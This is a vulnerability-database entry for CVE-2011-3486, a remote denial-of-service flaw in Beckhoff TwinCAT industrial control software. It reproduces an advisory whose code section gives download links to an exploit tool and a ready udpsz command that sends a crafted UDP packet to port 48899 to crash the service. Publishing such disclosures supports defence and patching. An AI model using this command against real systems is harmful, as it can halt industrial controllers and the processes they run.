ID
VAR-E-201109-0023
CVE
| cve_id: | CVE-2011-3486 | Trust: 1.9 |
EDB ID
17835
TITLE
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service - Windows dos Exploit
Trust: 0.6
DESCRIPTION
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service. CVE-2011-3486CVE-75495 . dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | beckhoff | model: | twincat | scope: | eq | version: | 2.11.0.2004 | Trust: 1.0 |
| vendor: | beckhoff | model: | twincat | scope: | lte | version: | <=2.11.0.2004 | Trust: 0.6 |
| vendor: | beckhoff | model: | automation twincat r2 build | scope: | eq | version: | 2.112032 | Trust: 0.3 |
EXPLOIT
#######################################################################
Luigi Auriemma
Application: Beckhoff TwinCAT
http://www.beckhoff.de/twincat/
Versions: <= 2.11.0.2004
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"The Beckhoff TwinCAT software system turns almost any compatible PC
into a real-time controller with a multi-PLC system, NC axis control,
programming environment and operating station."
#######################################################################
======
2) Bug
======
Denial of Service caused by an invalid read access.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17835.zip
udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
CREDITS
Luigi Auriemma
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-3486 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 17835 | Trust: 1.6 |
| db: | EDBNET | id: | 40356 | Trust: 0.6 |
| db: | BID | id: | 49599 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-3486 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/17835/ | Trust: 0.6 |
| url: | http://www.beckhoff.de/english.asp?twincat/default.htm | Trust: 0.3 |
| url: | http://www.us-cert.gov/control_systems/pdf/ics-11-279-04.pdf | Trust: 0.3 |
| url: | http://aluigi.altervista.org/adv/twincat_1-adv.txt | Trust: 0.3 |
SOURCES
| db: | BID | id: | 49599 |
| db: | EXPLOIT-DB | id: | 17835 |
| db: | EDBNET | id: | 40356 |
LAST UPDATE DATE
2022-07-27T09:45:29.605000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 49599 | date: | 2011-10-11T17:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 49599 | date: | 2011-09-13T00:00:00 |
| db: | EXPLOIT-DB | id: | 17835 | date: | 2011-09-14T00:00:00 |
| db: | EDBNET | id: | 40356 | date: | 2011-09-14T00:00:00 |